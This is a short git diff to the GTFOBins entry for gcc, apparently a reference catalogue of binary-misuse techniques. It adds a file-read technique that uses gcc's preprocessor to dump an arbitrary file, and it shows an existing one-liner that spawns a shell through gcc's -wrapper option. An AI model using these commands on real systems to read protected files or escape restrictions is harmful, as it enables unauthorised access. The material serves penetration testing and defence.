diff --git a/_gtfobins/gcc.md b/_gtfobins/gcc.md index 0c7f668..435d421 100644 --- a/_gtfobins/gcc.md +++ b/_gtfobins/gcc.md @@ -1,5 +1,9 @@ --- functions: + file-read: + - code: | + LFILE=file_to_read + gcc -x c -E "$LFILE" shell: - code: gcc -wrapper /bin/sh,-s . sudo: